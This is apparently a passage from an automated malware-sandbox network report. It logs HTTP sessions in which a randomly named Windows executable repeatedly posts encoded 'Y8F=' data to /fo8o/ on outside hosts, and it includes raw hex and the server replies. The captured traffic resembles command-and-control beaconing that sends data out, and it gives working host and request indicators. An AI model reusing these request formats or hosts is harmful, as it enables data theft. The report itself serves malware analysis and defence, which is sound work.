4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 47 4c 53 67 35 6d 54 6e 53 58 69 33 68 55 70 41 57 32 6d 54 6a 35 54 32 41 32 4a 54 36 37 31 76 36 7a 64 6f 71 68 Data Ascii: Y8F=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FGLSg5mTnSXi3hUpAW2mTj5T2A2JT671v6zdoqh
Jun 26, 2024 14:57:40.508094072 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Wed, 26 Jun 2024 12:57:40 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	65249	34.120.249.181	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:42.383059025 CEST	1806	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 43 6b 57 67 6b 57 32 42 48 6f 4c 47 79 6d 47 67 57 78 4d 69 6a 71 57 37 7a 76 37 5a 69 74 78 4e 54 6a 49 75 37 4f 47 5a 38 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 30 58 30 71 4f 61 63 77 37 4b 71 78 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 48 44 73 32 4c [TRUNCATED] Data Ascii: Y8F=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICM9hRFQhCkWgkW2BHoLGymGgWxMijqW7zv7ZitxNTjIu7OGZ8DcWsjUGcXezRh9NBL1L1Xx9IKUlb4Dw367IijJKiXvzszhZNtTSnoq9zIVRxF+0X0qOacw7Kqx6XMArI00Rk+XW43WzKFSGJcg34Ug6XCttvOpYHDs2LgqPSxA4udmxAnzbTYJZfcIAsFH5RRH1G91uuA7xVssKePfPt5D/p8or1ojF02/cgD4sFpbSKJAK4VQqmCtPcm9FGvYk8bMXjKNO+uo05FJfIb4PfvqyzzezR78iUGbKriLN/lhtw2Oqzl7bEnjIqLIo/aUNjfX2HoUbUNtyYFO2H9uxoQBCl2jmWstRSLJaxqX/8K7FOuHo2tJqxarXXaBfS+6OxD+jsh/s7zdPZ/Xv/wWevJ3yvX5iqw3QuzJ1BIEPBOlpYkDTvr4crmd+OJgV726z7YZPeXRVLQzBFibvYwtxmpfihAd1OS1BG8IZ61oAd+QNo15WavDJr866ysq9Bv2oWFLKKYm+Cfd7i+/YeMjboD6KGQBAACXbfFg1+m1RvXyfhXw9PjPw4WZq1ZNfyGuf6DijPqhFkASIPTdSn2b9OWz9ASlxaL805S0n2ScUIED8HBGoDqyskH16R3luMk2YBNlT1FpCTl0er6FVWV+Y4OSx1xx7/0helFGR/TTF3VfNgpcynUzfgd316mJlfryYFFUVpwSwPhvezERq6U8vDXUjEu/64UuZXGdM4sHBv2zKRecsYFRzfYN1zV9DX64rhFB1QIuTR0gr9q4njOC1lOHTQ96AAwtCHq+rhbWO6M/NZ7ozGJB4KfhxRAMXhNnrQJ7soAV [TRUNCATED]
Jun 26, 2024 14:57:43.016334057 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Wed, 26 Jun 2024 12:57:42 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Jun 26, 2024 14:57:43.019407034 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	65250	34.120.249.181	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:44.913909912 CEST	514	OUT	GET /fo8o/?Y8F=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrINr9TZW+RNBVQYBQJyEcpoFJRXOlD4bLupvYs9MkX8JY0Q==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.660danm.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:57:45.562141895 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 26 Jun 2024 12:57:45 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED] Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
Jun 26, 2024 14:57:45.562167883 CEST	1236	IN	Data Raw: 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
Jun 26, 2024 14:57:45.562184095 CEST	1236	IN	Data Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2c 69 73 55 43 3a 65 28 29 2c 69 73 51 75 61 72 6b 3a 72 28 29 2c 69 73 5f 64 75 61 6e 6e 65 69 3a 65 28 29 7c 7c 72 28 29 7d 2c 6e 29 2c 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()\|\|r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
Jun 26, 2024 14:57:45.562201023 CEST	400	IN	Data Raw: 72 28 76 61 72 20 71 73 4c 69 73 74 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 Data Ascii: r(var qsList=(window.location.search\|\|"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=true"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setA
Jun 26, 2024 14:57:45.572127104 CEST	1236	IN	Data Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
Jun 26, 2024 14:57:45.572141886 CEST	117	IN	Data Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38 Data Ascii: <script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	65251	217.196.55.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:50.800465107 CEST	787	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d Data Ascii: Y8F=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
Jun 26, 2024 14:57:51.360354900 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 26 Jun 2024 12:57:51 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	65252	217.196.55.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:53.337353945 CEST	807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65 Data Ascii: Y8F=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
Jun 26, 2024 14:57:53.921366930 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 26 Jun 2024 12:57:53 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	65253	217.196.55.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:55.868060112 CEST	1824	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 [TRUNCATED] Data Ascii: 